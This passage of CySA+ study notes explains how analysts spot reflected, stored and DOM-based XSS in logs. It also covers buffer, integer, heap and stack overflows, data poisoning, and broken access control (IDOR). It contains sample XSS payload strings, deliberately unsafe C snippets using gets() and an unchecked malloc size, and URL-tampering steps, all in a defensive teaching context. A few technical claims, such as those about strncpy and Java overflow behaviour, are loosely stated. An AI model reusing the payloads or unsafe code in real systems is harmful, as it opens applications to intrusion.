If the server forgets to:
● Encode output
● Validate input
● Set HttpOnly or Secure
● Define a Content-Security-Policy

...then the browser just follows instructions — even if those instructions were poisoned by an attacker.

The Big Takeaway
You&#39;re not wrong for being surprised. In fact:

88

This is the exact realization most junior analysts never get — and the exact insight hiring
managers love to hear.
It shows you’re not just memorizing terms — you’re understanding how trust is delegated across a system,
and why weak server design compromises the entire chain.

5. Analyst Responsibilities
● Understand where each type of XSS comes from (server vs. browser)
● Analyze reports or logs to determine whether input was reflected, stored, or DOM-triggered (BELOW)

● Recommend both code-level changes and browser-level defenses
● Use tools like:
○ Burp Suite or ZAP to simulate XSS attacks
○ Browser developer tools to inspect DOM and cookies
○ Threat intelligence feeds to detect known XSS attack variants
○
How to Identify XSS Types in Reports or Logs

Reflected XSS
● You may see suspicious input in a URL — often in a query string — that is immediately echoed in
the response.
● Web server logs (e.g., Apache, NGINX) may show incoming GET or POST requests containing
&lt;script&gt; or encoded script-like content.
● SIEM tools or proxy logs might reveal URL patterns containing suspicious characters, sent by email
or links, with activity immediately following the request.

Example clue:
Request: GET /search?q=&lt;script&gt;alert(1)&lt;/script&gt;
Response contains that exact string echoed back.
Analyst Note: In reflected XSS, the attacker sends a crafted link to the victim, and the malicious
input is immediately echoed in the server’s response. When the victim clicks the link, their
browser executes the script on the spot. Alerts may be triggered by downstream activity —

89

such as an outbound connection to an attacker-controlled domain, browser behavior that
violates CSP, or unusual request patterns in proxy or firewall logs. The analyst must recognize
that the attack came from a one-time, immediate reflection — often visible in URL parameters
— and connect the activity back to the triggering request.

Stored XSS
● Log entries or reports may show user input with script content being saved — such as in comment
submissions, profile updates, or forum posts.
● The malicious input doesn’t cause an alert right away, but shows up later when another user loads
the page.
● You might spot it during vulnerability scans that test for stored payloads, or by correlating a delayed
execution with earlier input.

Example clue:
A script tag appears in a database field (e.g., comments), and multiple users trigger alerts
when loading that page later.
Analyst Note: In stored XSS, the victim doesn’t directly trigger a log — but their browser
executes the attacker’s script, which may cause suspicious behavior (e.g., sending data to an
external server, violating a content security policy, or making abnormal requests). These
actions are detected by the organization&#39;s monitoring tools — such as SIEMs, proxies, CSP
violation reports, or EDR agents — which then generate alerts. The analyst&#39;s role is to correlate
this downstream behavior back to the originally stored malicious input.

DOM-Based XSS
● Logs may show normal-looking requests, but attacks are triggered entirely in the browser, often
using a fragment (#) or parameter that never reaches the server.
● SIEMs, web proxies, or IDS may not detect this unless browser-side monitoring (like Content
Security Policy violation reports or JavaScript logging) is in place.
● Analysts often discover DOM-based XSS through client-side source code review, penetration
testing, or browser behavior analysis (e.g., dev tools or Burp Suite).

Example clue:

90
A URL like https://example.com/page#&lt;script&gt;steal()&lt;/script&gt; triggers code execution in the
browser, but there’s no trace of the script in server logs.
“If the application is hosted internally by your organization, your SIEM or log aggregation tools
will likely have access to relevant web server logs. However, for third-party or externally
hosted sites, you will not have visibility into their logs unless special integrations or proxies
are in place — meaning detection often relies on client-side behavior, CSP violations, or
endpoint telemetry.”
○

6. Summary — Bullet Point Format
● XSS = Browser is tricked into executing untrusted JavaScript
● Stored XSS = Malicious script saved in database, served to many users
● Reflected XSS = Malicious script sent via input or URL, reflected in page
● DOM-Based XSS = JavaScript in browser inserts malicious data into the DOM
● Impact = Session hijacking, user impersonation, credential theft, malware
● Key Mitigations:
○ Input validation
○ Output encoding (HTML, JS, URL, etc.)
○ CSP headers
○ Secure frameworks
○ Secure cookies (HttpOnly, Secure)
○ DOM-safe coding practices

Key Takeaway: XSS is not about breaking into a server — it&#39;s about hijacking user trust in the
browser. Full mitigation requires defending both the server and the client. Executive-level
understanding means knowing exactly what the attacker does, how they do it, what they gain,
and how we stop them — step by step.

91

Types of Overflow Vulnerabilities
We’ll now break down the four main overflow types — each with a definition, attack flow, real-world example,
and mitigation strategy.

Buffer Overflow — Executive-Level
What Is a Buffer?
A buffer is a small, temporary block of memory that a program sets aside to hold data — often user input —
such as a username, password, or a message.
Example: A program says, “I’ll reserve 64 bytes to store the user&#39;s input.”

What Is a Buffer Overflow?
A buffer overflow happens when the program receives more data than the buffer was sized to handle — and
the extra data doesn’t just disappear. It spills over into adjacent areas of memory, which may contain critical
information like instructions or control data.
Think of pouring 100 ounces of liquid into a 64-ounce glass. It overflows — and in a computer,
that spill can overwrite nearby instructions, leading to errors, crashes, or full takeovers.

What Gets Overwritten — And Why It’s Dangerous
When a program runs, it uses a call stack — a section of memory where it stores:
● Local variables (like your 64-byte buffer)
● Temporary values
● And crucially: the return address

What Is a Return Address?

92
When one function calls another, the return address is the exact memory location the program
needs to jump back to when the called function is done.
Think of it like a bookmark:
● Function A calls Function B
● The return address is the note: “When B finishes, go back to this exact line in A.”

If an attacker overwrites that address, they can make the program jump to malicious code instead of back to
where it’s supposed to go.
That’s what makes buffer overflows so dangerous:
They allow an attacker to hijack program flow — not just crash the app, but redirect it to
execute their instructions.

Attack Flow: Buffer Overflow Step-by-Step
1. Program allocates a buffer (e.g., 64 bytes) on the stack
2. Attacker provides input (e.g., 200 bytes) — too much for the buffer
3. The extra data spills into adjacent memory, including the return address
4. The attacker includes a malicious return address in their input
5. When the function finishes, it jumps to the attacker’s code

Real-World Example (Now Fully Explained)
● The gets() function in C reads user input but doesn’t limit how much

A developer writes:
char name[64];
gets(name); // dangerous: no length checking
●
● The attacker sends 200 bytes, including:
○ Some filler to overflow the buffer

93

○ A crafted return address pointing to their malicious code
○ Their payload (e.g., shellcode that opens a backdoor)

Result: When the function finishes, it jumps into the attacker&#39;s code — giving them control.

Mitigations — Fully Defined
Here’s how systems defend against buffer overflows:
1. Use Safe Functions
● Replace dangerous functions like gets() with safer alternatives like:
○ fgets() (limits how much input is accepted)
○ strncpy() (copies with bounds checking)

2. Input Validation
● Always check the length of incoming data before storing it in memory

3. Stack Canaries
● A small, random value is placed just before the return address in memory
● If an overflow occurs, the canary is overwritten
● Before returning, the program checks the canary — if it changed, the program knows something’s
wrong and stops

Think of it like a “tripwire” that alerts the program to memory tampering
4. Address Space Layout Randomization (ASLR)
● Randomizes where things are stored in memory each time a program runs
● Makes it much harder for attackers to predict where their code or return address should go

5. Compiler-Based Protections
What Is a Compiler?

94
A compiler is a specialized program that translates human-readable source code (written in
languages like C, C++, or Rust) into low-level machine code that a computer’s processor can
execute directly. It takes high-level instructions like printf(&quot;Hello&quot;); and turns them into binary
instructions (e.g., 10110000) that the CPU understands. But compilers don’t just translate —
they also optimize, analyze, and in modern environments, insert security protections into the
compiled program. For example, when compiling a C program, the compiler can automatically
insert stack canaries, enable bounds checks, or add code to detect buffer overflows at
runtime — this is called compiler-based protection. These security features aren’t part of the
original source code the developer writes — they’re added by the compiler to strengthen the
final executable.

​​
● Stack Smashing Protection (SSP): Compiler inserts code to detect buffer overflows automatically
● Programs can be compiled with flags like -fstack-protector to add these defenses

Summary – Bullet Points
● A buffer is a fixed-size memory space; overflow occurs when data exceeds that size
● Overflow can overwrite the return address, redirecting execution to attacker code
● Defenses include:
○ Safe functions (fgets, strncpy)
○ Input validation
○ Stack canaries (tripwire)
○ ASLR (random layout)
○ Compiler protections (stack-protector)

Key Takeaway: Buffer overflows are dangerous because they don’t just crash a program —
they allow attackers to rewrite the program’s memory map and hijack execution entirely.
Understanding the role of the return address is critical to seeing how this works.

95

2. Integer Overflow

Integer Overflow — Executive-Level
Explanation

What Is an Integer?
An integer is a whole number — like 5, 0, -3, or 3000000.
In programming, integers are stored in memory using a fixed number of bits — like 8, 16, 32, or 64 bits. The
number of bits determines the range of values the integer can represent.
For example:
● A 32-bit unsigned integer (no negative values) can store values from 0 to 4,294,967,295
● A 32-bit signed integer (includes negatives) can store values from -2,147,483,648 to +2,147,483,647

What Is an Integer Overflow?
An integer overflow occurs when a program performs an arithmetic operation (like addition or multiplication)
that goes beyond the maximum (or minimum) value an integer type can represent.
When this happens, the value wraps around — much like an old odometer.
Example:
If you try to store 4,294,967,296 in a 32-bit unsigned int (max = 4,294,967,295), it wraps to 0.
If you subtract below 0, it wraps to the maximum value.
This causes logic failures, incorrect values, and can lead to memory corruption or security vulnerabilities.

Attack Flow — Step-by-Step Example
1. A program uses a 32-bit unsigned integer to track the length of a user-provided message
2. The attacker provides a value like 4,294,967,295 (2^32 - 1)

96

3. The program adds 1 to calculate a buffer size (e.g., length + 1)
4. The result wraps to 0 (because 4,294,967,296 is too big for 32 bits)
5. The program allocates zero bytes of memory for the message
6. When it tries to write the message into that space — heap overflow occurs, potentially overwriting
adjacent memory

Why This Is Dangerous
At first glance, integer overflows might seem like “math bugs.” But in reality, they’re one of the most subtle
and dangerous forms of memory manipulation, because:
● They often go undetected by compilers
● They affect input validation logic and memory allocation
● Attackers can use them to:
○ Bypass length checks
○ Trick programs into under-allocating memory
○ Cause overflows, buffer overreads, or code execution

Real-World Example
Let’s say a server accepts file uploads, and calculates the total size needed to store the uploaded file like
this:
c
CopyEdit
● int totalSize = headerSize + userFileSize;
● char* buffer = malloc(totalSize);

If userFileSize is attacker-controlled and large enough to cause overflow when added to headerSize, then
totalSize becomes smaller than expected. The buffer is under-allocated, and writing the file into it causes a
heap overflow — just like a buffer overflow.

97
This kind of integer overflow has been used in real-world exploits — including image parsers,
PDF processors, and even kernel-level code.

What Is Wraparound, Exactly?
Wraparound means that when a number exceeds its maximum possible value in binary, it resets to the
beginning of the allowed range.
Analogy: If a digital clock only goes up to 12, and you add 1 to 12, you wrap around to 1.
In computers:
● A 32-bit unsigned integer wraps from 4,294,967,295 + 1 → 0
● A signed 32-bit integer wraps from 2,147,483,647 + 1 → -2,147,483,648

This can break conditions like:
c
CopyEdit
● if (length &gt; bufferSize) // Works until overflow happens

Mitigations — Fully Explained
1. Use Safe Math Libraries or Checked Arithmetic
● Many modern languages and compilers now support functions that raise an error when an overflow
occurs
● Example:
○ __builtin_add_overflow() in C/C++ (GCC/Clang)
○ Rust has overflow-checked arithmetic in debug mode by default

2. Enforce Input Validation on Numeric Fields

98

● Don’t trust incoming lengths, counts, or offsets from untrusted sources
● Apply strict upper limits, sanity checks, and range enforcement

3. Use Languages with Automatic Bounds Checking
● High-level languages like Python and Java don’t allow overflow in the same way:
○ Python integers expand automatically as needed (arbitrary-precision)
○ Java performs checks and raises errors under certain overflow conditions (depending on
type and operation)

● Using memory-safe languages can eliminate entire classes of overflow bugs

Summary – Bullet Points
● Integer Overflow happens when a number exceeds the max/min limit of its data type
● The value wraps around, breaking logic and triggering unsafe operations
● It is often used to bypass validation or under-allocate memory
● Common in low-level languages like C/C++
● Defended by:
○ Safe math functions
○ Strict input validation
○ Memory-safe languages

Key Takeaway: Integer overflows are subtle but dangerous. They’re not obvious crashes —
they are logic failures that can cause under-allocations, heap overflows, and attack surface
expansion without obvious signs. The best defenses combine safe math, strict validation, and
language-level protections.
●

99

Heap Overflow — Executive-Level
Explanation

What Is the Heap?
The heap is a region of a program’s memory used for dynamic, long-term storage.
● When a program doesn’t know in advance how much memory it needs — such as when reading user
input or loading a file — it allocates memory on the heap at runtime.
● This is different from the stack, which is used for short-term function calls and local variables.

Think of the stack as a to-do list — short-lived, ordered, grows and shrinks quickly
Think of the heap as a storage room — more flexible, more persistent, but messier and harder
to guard

Who Manages the Heap?
In low-level languages like C or C++, memory must be explicitly requested from the operating system using
functions like:
● malloc() in C
● new in C++
● calloc(), realloc(), etc.

The OS returns a pointer — a memory address — and the program can write data into that space.
The program is also responsible for freeing that memory later using free() or delete.

What Is a Heap Overflow?
A heap overflow occurs when a program writes more data than a dynamically allocated memory region (heap
buffer) was sized to hold — and that excess data spills over into adjacent heap memory structures.
In simple terms: the program says, “Give me 100 bytes.” The attacker sends 300. The extra 200
bytes overwrite nearby memory.

100
What makes this dangerous is that heap memory contains control information — such as pointers to other
memory blocks, memory layout metadata, and sometimes even function pointers.
By overwriting this sensitive heap data, attackers can manipulate how the program allocates
memory, what code it executes, or where it jumps in memory.

Clarifying: Is the Heap Still RAM?
Yes — both the stack and the heap are regions of RAM (Random Access Memory).
● The difference lies in how the memory is used:
○ The stack is for short-term, fast-access operations (function calls)
○ The heap is for flexible, long-term memory that must be explicitly managed

So even though heap memory is “long-term” compared to the stack, it’s still RAM — it’s just dynamically
controlled by the application, not automatically handled.

Clarifying: How Can Heap Be Long-Term If RAM Is Short-Term?
You&#39;re absolutely right that RAM (Random Access Memory) is considered short-term memory compared to
storage like a hard drive or SSD. RAM is volatile, meaning its contents are erased when the computer is shut
down. But when we say the heap is for “long-term memory,” we mean longer-lasting within a running
program — not permanent like a file on disk. So:
● The stack is for very short-lived memory — like local variables inside a function that disappear as
soon as the function finishes
● The heap is for memory that might last across multiple functions, user interactions, or even the
entire program’s life
● Both live in RAM, but the heap is simply more persistent during execution

In other words:
The heap is not long-term storage — it’s long-term working memory inside the short-term
space of RAM.

101

Attack Flow — Step-by-Step Breakdown
A program allocates a chunk of heap memory (e.g., 128 bytes) to hold user data

○ Example: char* input = malloc(128);

The attacker sends more than 128 bytes — maybe 300 bytes

The program does not check the input size, and blindly writes all 300 bytes into the 128-byte buffer

The extra 172 bytes overflow into adjacent memory, which may contain:

○ Heap metadata
○ Function pointers
○ Structures used by the memory manager (malloc/free)

The attacker crafts the overflow to modify a pointer or overwrite code, causing the program to:

○ Jump to attacker-controlled memory
○ Allocate memory that overlaps with attacker payload
○ Free or overwrite the wrong memory address
○ Or execute malicious shellcode
Analyst Note: Successfully exploiting a heap overflow requires the attacker to understand the
memory layout of the target system in detail. This includes knowing how the heap allocator
structures metadata and where function pointers or control structures reside. Attackers often
analyze the program&#39;s behavior, source code, or compiled binaries and may use tools like
debuggers or memory profilers to map out heap behavior. By manipulating memory allocation
patterns — a technique called heap grooming — they position their malicious data for maximum
effect. While complex, this type of attack can lead to powerful results, such as redirecting execution
or hijacking memory operations, especially in systems lacking protections like ASLR or heap
integrity checks.

Real-World Example: Image Parser Heap Overflow
An image parser is a component of software that reads image files like PNGs, JPEGs, or GIFs and interprets
their internal data.

102
If an image contains malformed or oversized data chunks, and the parser fails to check those lengths
correctly, it may under-allocate memory on the heap — leading to an overflow when the image data is read
in.
This was the basis of multiple real-world exploits — including vulnerabilities in browsers, PDF
readers, and image libraries — where simply opening a malicious image could trigger code
execution via heap overflow.

Why Heap Overflows Are Dangerous
● Heap memory is less structured than the stack and doesn’t have as many built-in protections
● Many programs store critical data structures on the heap, including:
○ User input
○ Session data
○ Pointers to code
● Overwriting these structures gives attackers deep control over how memory is used and where
execution goes

Heap overflows are harder to detect and exploit than stack overflows — but also harder to defend against.

Mitigations — Fully Explained
1. Use Safe Memory Allocation Functions
● Always validate input lengths before writing to heap memory
● Avoid using unsafe string functions (strcpy, strcat) that don’t check bounds

2. Implement Heap Integrity Checks
● Many modern systems include runtime checks that detect if heap metadata has been altered
● Heap protection libraries and hardened memory allocators can abort the program if they detect
corruption

3. Enable Heap Metadata Protection (e.g., Safe Unlinking)

103
● &quot;Unlinking&quot; is the process where freed heap memory is reconnected back into the system’s
available memory list
● Older systems allowed attackers to corrupt pointers and trick the memory manager during unlinking
● Modern systems use safe unlinking techniques — checking pointer integrity before following them

If the pointers have been tampered with, the operation is halted, preventing exploitation.
4. Employ Modern Memory-Safe Languages
● High-level languages like Python, Java, and Rust do not expose raw heap memory to the
programmer
● These languages include automatic bounds checking and managed memory, making heap overflows
nearly impossible in standard usage

Summary – Bullet Points
● Heap Overflow occurs when dynamically allocated memory is overwritten beyond its bounds
● The overflow corrupts adjacent heap data, including metadata and control structures
● Exploits can lead to code execution, memory corruption, or privilege escalation
● Defenses include:
○ Bounds checking and safe memory functions
○ Heap integrity verification
○ OS-level protections like safe unlinking
○ Using memory-safe languages

Key Takeaway: Heap overflows are subtle, low-level vulnerabilities that exploit how memory is
managed during runtime. While more complex than stack-based exploits, they offer attackers
the ability to hijack execution, redirect memory use, or escape sandboxed environments —
especially in systems that lack modern memory protections.

104

Stack Overflow — Executive-Level
Explanation

What Is the Stack?
The stack is a region of a program’s memory (within RAM) used for managing function calls and their
associated local variables.
Each time a function is called, a small block of memory — called a stack frame — is added to the stack. This
frame contains:
● The function’s local variables
● The function’s parameters
● The return address (where the program should resume after the function completes)

When the function finishes, its frame is removed (“popped”) from the stack.

Stack Memory Is:
● Short-lived — only lasts for the duration of a function call
● Automatically managed — added and removed by the system
● Fixed in size — typically just a few megabytes per program thread

What Is a Stack Overflow?
A stack overflow occurs when the program tries to use more stack memory than is available — typically by:
1. Calling functions recursively with no exit condition (infinite recursion), or
2. Declaring very large local variables, like arrays or buffers, that exceed the stack size

The stack “fills up,” and there’s nowhere left to store the next frame. This triggers a crash or,
in rare cases, allows the attacker to overwrite critical memory structures.

105

Is This the Same as a Buffer Overflow?
Not quite — but they’re related.
● A stack overflow refers to the entire stack region being exceeded, often by recursion or oversized
frames.
● A stack-based buffer overflow refers to writing too much data into a local buffer stored on the stack,
which can overwrite adjacent memory, such as the return address — enabling code execution.

Many of the classic exploits (like stack smashing) are technically buffer overflows on the stack
— not general stack overflows from recursion.

Attack Flow — Step-by-Step
A program contains a recursive function (a function that calls itself)
Example:
void recurse() {
recurse(); // no base case
}
1.
2. The attacker triggers the function
○ Each call adds a new stack frame
○ The stack fills up rapidly
3. Once the stack reaches its maximum size (e.g., 1 MB), the next call fails to allocate memory
4. What happens next depends on the system:
○ Most modern systems safely terminate the program (result: crash)
○ In older or poorly secured environments, the attacker may use this to:
■ Overwrite the return address
■ Corrupt stack metadata
■ Redirect execution to attacker-controlled code

106

What Is a Controlled Overwrite?
A controlled overwrite is when the attacker intentionally overflows memory in such a way that they overwrite
a specific value or structure — like the return address — with a value they chose.
In stack-based buffer overflows, this is how attackers gain code execution: they overwrite the return address
with a pointer to their malicious code (often included in the same payload).
In general stack overflows (like recursion-based overflows), this is harder to achieve, but in unprotected
systems, clever use of local variable placement can allow control over adjacent stack content.

Real-World Example
An application processes nested data structures (e.g., XML, JSON, file formats). An attacker crafts input that
causes the parser to recurse thousands of times without an exit condition.
Result:
● The stack overflows
● The application crashes (denial of service)
● Or in rare cases, filters, validation logic, or memory pointers are bypassed or corrupted

Mitigations — Fully Explained and Role-Assigned
1. [Developer] Enforce Recursion Depth Limits
● Limit the number of times a function can call itself
● This can be built into application logic or supported by language settings
○ Example: Python has a default recursion limit of ~1000

2. [Developer] Avoid Large Local Variables
● Declare large arrays, buffers, or data structures on the heap, not the stack
● In C: use malloc() instead of declaring char data[1000000];

3. [Operating System / Compiler] Set Stack Size Limits

107

● Most systems impose limits on stack size per process or thread
● This prevents stack overflows from consuming all memory
● Example: ulimit -s on Linux defines max stack size
● Compilers can also insert stack guard checks to detect stack smashing

Summary – Bullet Points
● Stack Overflow happens when a program uses more stack memory than allowed — often through
recursion or large local variables
● It leads to program crashes, and in some cases, memory corruption or execution control
● Defended by:
○ Limiting recursion depth
○ Moving large data to the heap
○ Enforcing OS-level stack size limits and using compiler protections

Key Takeaway: Stack overflows occur when the function call structure of a program
overwhelms its memory limits. While often causing crashes, they can also lead to memory
corruption and control-flow hijacking in weakly protected systems. Developers must design
with memory limits in mind, and systems must enforce stack safety at the OS and compiler
level.

Buffer Overflow (Expanded Summary)
A buffer overflow occurs when a program writes more data into a fixed-size buffer than it can hold, causing
adjacent memory — including the return address or local variables — to be overwritten. This can allow an
attacker to crash the program or hijack its execution flow. It is mitigated by using safe functions that enforce
length limits (like fgets()), validating input sizes, and employing protective mechanisms like stack canaries
and address space randomization to detect and block memory tampering.

Integer Overflow (Expanded Summary)
Integer overflows happen when arithmetic operations produce values outside the range supported by the
data type, causing them to wrap around to zero or negative values. This can result in incorrect logic, unsafe

108
memory allocation, or opportunities for memory corruption. Preventing integer overflows requires range
checking, the use of overflow-detecting arithmetic functions, and strict validation of any numeric inputs that
influence memory behavior or control logic.

Heap Overflow (Expanded Summary)
A heap overflow occurs when data written to dynamically allocated memory exceeds the allocated bounds
and spills into adjacent heap memory. This can corrupt critical heap metadata or function pointers, allowing
attackers to manipulate memory allocation or hijack control flow. Mitigations include using memory-safe
allocation routines, validating input sizes, enabling heap integrity checks, and relying on system-level
features like safe unlinking to prevent heap corruption from being exploitable.

Stack Overflow (Expanded Summary)
Stack overflows result from excessive use of stack memory, often due to uncontrolled recursion or large
local variable declarations. When the stack exceeds its limit, it can cause a crash or, in rare cases, controlled
memory corruption. This is prevented by enforcing recursion depth limits, moving large data to the heap,
and using operating system and compiler settings that restrict and monitor stack size and structure integrity.

Key Takeaway (Expanded Summary)
All overflow vulnerabilities stem from a common root cause: programs make unsafe assumptions about the
size, range, or volume of incoming data. Attackers exploit these assumptions to exceed boundaries in
memory and alter program behavior. Preventing overflows requires a combination of defensive
programming, runtime enforcement, and low-level memory protection techniques, tailored to the specific
memory region involved — stack, heap, or numeric type.

Data Poisoning — Executive-Level
Breakdown

Definition (Plain and Complete)
Data poisoning is a type of attack in which an adversary intentionally injects false, misleading, or malicious
data into a trusted data source to corrupt downstream processes, such as machine learning (ML) models,
security analytics, or automated decision systems.

109
Unlike classic code injection or memory-based attacks, data poisoning targets the integrity of the data itself,
aiming to influence how systems learn, detect, or react over time.
Think of it as contaminating the water supply of an entire system — not attacking the pipes,
but altering the input so that everything downstream becomes unreliable.

Real-World Analogy (Healthcare)
Imagine a hospital relying on a clinical algorithm trained on patient data to predict heart attack risk. If
attackers inserted false patient records that misrepresent symptoms, the model may learn flawed
correlations — like thinking low blood pressure is more dangerous than high blood pressure.
The algorithm begins to &quot;trust&quot; faulty patterns — not because its math is wrong, but because
its training data was poisoned.

Where Attackers Inject Data Poisoning in Cybersecurity
Contexts
These are the target surfaces where poisoned data may be injected by
attackers:
System Why It’s Vulnerable Poisoning Mechanism

Machine Learning-Based
Security Tools

They learn from historical logs
or behavior patterns

Attacker injects false behaviors or traffic to
teach the model incorrect patterns

Behavior-Based Threat
Detection

Uses behavioral baselines
(e.g., UEBA, anomaly
detection)

Attacker behaves benignly while preparing
for an attack to shift the “normal” baseline

Email Spam Filters Learn from user-labeled emails Attacker floods system with real phishing
emails labeled as “safe” to degrade filter
quality

Network Traffic
Classifiers

Use previous network traffic to
define what&#39;s suspicious

Attacker generates &quot;noisy but harmless&quot;
traffic to mislead classifiers into trusting
malicious patterns

110

SIEM Correlation Rules
(when adaptive)

Some SIEMs allow rule
adjustments based on
observed trends

Attacker introduces benign events that
resemble malicious ones to increase false
positives or desensitize alerts

Automated Vulnerability
Scoring Systems

Use external datasets (e.g.,
CVSS history, exploitability
trends)

Poisoning open-source threat feeds or public
vulnerability descriptions could lead to
prioritization errors

AI Tools Using Public
Training Data

May retrain on open data (e.g.,
GitHub, VirusTotal
submissions)

Attacker contributes poisoned samples that
affect how tools detect threats or classify
files

What I Should Have Said Upfront:
Data poisoning is injected into systems that learn from data. These include machine learning-
based detection systems, behavioral analytics tools, and any adaptive automation that retrains
or evolves based on previous data inputs. These are not the systems that detect data
poisoning — they are the ones that are vulnerable to it.

Actors (Who Does What)
Actor Role

Attacker Injects manipulated data into the trusted source (e.g., logs, training sets,

APIs)

Defensive System Trains or updates its detection model or logic based on poisoned data

Developer or Data
Engineer

May unknowingly include unvalidated data into system learning or
automation logic

Security Analyst Must detect inconsistencies, irregular results, or anomalies in performance

111

due to poisoned logic

Attack Flow — Step by Step
1. Data Source Identified
○ Attacker targets a system that relies on data inputs to learn or make decisions
○ Example: A spam filter that learns from incoming user-tagged emails
2. Poisoned Data Introduced
○ Attacker submits false data into the system
■ Marking real phishing emails as &quot;safe&quot;
■ Submitting fake benign traffic to a network anomaly detector
■ Corrupting a model’s training set with mislabeled data

3. Model or Rule Learns From Poisoned Input
○ System retrains or updates its internal decision logic
○ The poisoned data alters what the system considers normal or malicious
4. System Behavior Is Corrupted
○ Security controls now miss real threats (false negatives)
○ Or begin flagging benign behavior as malicious (false positives)
○ In worst-case scenarios, attacker’s own traffic is deliberately made invisible

Types of Data Poisoning (Tactic Categories)
Type Description Example

Availability
Attacks

Goal is to degrade overall
performance or accuracy

Spam filter overwhelmed by mislabeled emails

112

Targeted
Poisoning

Goal is to hide specific attacker
behavior

Attacker sends traffic during off-hours to teach
a system it’s &quot;normal&quot;

Label Flipping Poisoned labels reverse truth Marking malware as safe during supervised

learning

Backdoor
Injection

Poisoning includes a secret trigger Model behaves normally until attacker-specific

input is seen

Mitigation Strategies — Fully Explained and Role-
Assigned
1. [Developer / Data Engineer] Validate and Clean Input Data
● Apply strict filters and validations on any incoming data that will influence automated learning
● Use whitelists, blacklists, and schema checks to detect suspicious or anomalous data formats
● Flag unusual label shifts or class imbalance in training datasets

2. [Security Analyst] Monitor for Detection Drift
● Analyze alerting patterns and classifier performance over time
● Watch for sudden drops in detection accuracy, or behavioral shifts that cannot be attributed to
environment changes

3. [System Architect] Use Data Provenance and Isolation
● Track the origin of training data and log sources
● Separate production training data from open or untrusted feeds
● Do not allow learning from public-facing systems unless segregated and filtered

4. [Security Engineer] Retrain with Verified Datasets
● Periodically retrain machine learning systems on vetted, known-good datasets

113

● Run shadow evaluations (test environments) to compare performance before full deployment

5. [All Roles] Use Ensemble Models and Outlier Detection
● Combine multiple detection models to reduce the impact of one poisoned source
● Integrate outlier analysis to flag suspicious behavior that would otherwise be trusted due to
poisoning

Real-World Example (SOC Context)
A SOC uses a behavioral analytics platform to detect unusual login behavior. The platform learns over time
what &quot;normal&quot; looks like.
An insider threat actor intentionally:
● Logs in late at night multiple times
● Performs benign actions (browsing internal resources)
● Repeats this pattern for weeks

Eventually, the system considers late-night logins normal for that user
Later, the same actor:
● Logs in at 2 a.m.
● Exfiltrates sensitive files
● And the system doesn’t alert — because it was trained not to

This is a classic targeted data poisoning attack.

Key Takeaway
Data poisoning is not about breaking code — it’s about breaking trust in the data that drives code. It corrupts
the logic of systems that rely on learning, adaptation, or behavioral modeling. Mitigating it requires data
discipline, input hygiene, ongoing monitoring, and architectural safeguards that prevent unverified data from
influencing core security logic.

114
Broken Access Control — Executive-Level
Breakdown
(CySA+ Domain 2.4: Given a scenario, recommend controls to mitigate attacks and software vulnerabilities)

Definition (Clear and Complete)
Broken Access Control occurs when a system fails to properly enforce permissions, allowing users to
perform actions or access data beyond their intended level of privilege.
This is not about authentication (proving who you are) — it’s about authorization (what you are allowed to do
after you&#39;ve logged in).
If access control is broken, attackers — or even legitimate users — can gain unauthorized access to files,
systems, APIs, or administrative functions.

Real-World Analogy (Healthcare)
Imagine a hospital’s EHR (electronic health records) system where any nurse can access every patient’s full
psychiatric history, regardless of their department or assigned patients. The system authenticates the nurse,
but doesn’t restrict what data they can see. This is a broken access control issue — the user is legitimate,
but the boundaries of access are missing.
Or worse: imagine a visitor figures out how to manually change the patient ID in the URL and access
someone else’s chart. This is insecure direct object reference (IDOR) — a specific form of broken access
control.

Core Problem
The system does not verify what the user is authorized to do, or fails to isolate resources based on role,
identity, or sensitivity.

IDOR Attack Flow (Step-by-Step)
1. Legitimate user logs in to the application
○ Example: An employee logs into the HR portal using valid credentials
○ The portal displays their profile at https://hr.company.com/profile/1293

115

2. The user realizes the profile page uses a numeric ID in the URL
○ This is called a direct object reference — the system identifies data using predictable IDs
3. Curious (or malicious) user modifies the URL manually
○ They change .../profile/1293 to .../profile/1294
○ No hacking tools are needed — just a browser and a guess
4. The application does not verify authorization for the requested object
○ It retrieves and displays profile 1294 without checking whether the user should have access
5. The user now sees (or modifies) another employee’s profile
6. The system authorized the request, but it failed to verify that the user had the right to access
that particular object.
7.

This is broken access control, specifically IDOR: insecure direct object reference
The user (legitimate or attacker) accessed data by referencing an internal object directly —
without permission being checked server-side.

2. What Does “Object Level” vs. “Action Level” Mean?
Let’s now define these terms precisely — because you’re right, the phrase “object or action level” sounds
technical but is unclear unless we unpack it.

Object-Level Access Control
Controls what data a user can access
● Examples:
○ Can user A view file B?
○ Can user 1001 access account 1002?
○ Can this user view this patient record?

If object-level access control is broken, users can access resources that belong to others, like in IDOR.

116

Action-Level Access Control
Controls what actions a user can perform
● Examples:
○ Can this user delete a file?
○ Can they perform a system backup?
○ Can they change someone else&#39;s password?

If action-level control is broken, users may perform actions that exceed their privilege level, such as vertical
privilege escalation.

Summary of the Distinction
Level What It Controls Example of Failure

Object-Level Which resources you can access Viewing someone else’s data

Action-Level Which operations you can perform Accessing an admin-only function

Common Types of Broken Access Control
Type Description Example

Insecure Direct Object
Reference (IDOR)

Resource access is controlled
only by a predictable identifier

Changing a URL or ID to access another
user’s data

Vertical Privilege Regular users gain admin-level Forcing access to an admin endpoint

117

Escalation actions like /admin/settings

Horizontal Privilege
Escalation

Users access peer-level
resources they shouldn’t

Viewing or modifying other users’
records

Forced Browsing Navigating to unauthorized
resources by guessing URLs

Manually accessing hidden but
unprotected pages

Missing Function-Level
Access Control

UI hides a button, but the
backend doesn’t check
permission

Sending a crafted request to a protected
API even without UI access

Unvalidated Role
Transitions

Changing user role on the client
side

Modifying a session token to
impersonate another user type

Who’s Involved?
Role Responsibility

Attacker Explores weak or missing authorization boundaries

Application Developer Must enforce access rules at the server/API level

Security Analyst Detects anomalies in access logs, privilege abuse, or excessive permissions

System Administrator Defines role-based access control (RBAC) policies and permissions at the

infrastructure or OS level

Why It’s Dangerous

118
● Allows access to sensitive data, admin functions, or account takeover without needing to bypass
authentication
● Often abused by insiders, since they’re already authenticated
● Frequently occurs in API endpoints, web applications, or mobile apps
● May result in regulatory violations (e.g., HIPAA, GDPR) if data exposure occurs

Real-World Examples
● Facebook (2015) — Researcher discovered he could delete any user’s photos by modifying API
requests (IDOR)
● GitHub (2019) — Broken access control allowed unauthorized access to private repos in
maintenance mode
● Healthcare app — Allowed any logged-in user to query any patient record by changing patient ID in
the request

Mitigation Strategies — Fully Explained and Role-
Assigned
1. [Developer] Enforce Access Checks Server-Side
● Never rely on client-side enforcement (like hiding buttons in the UI)
● Always validate user roles and ownership of requested data or actions at the backend

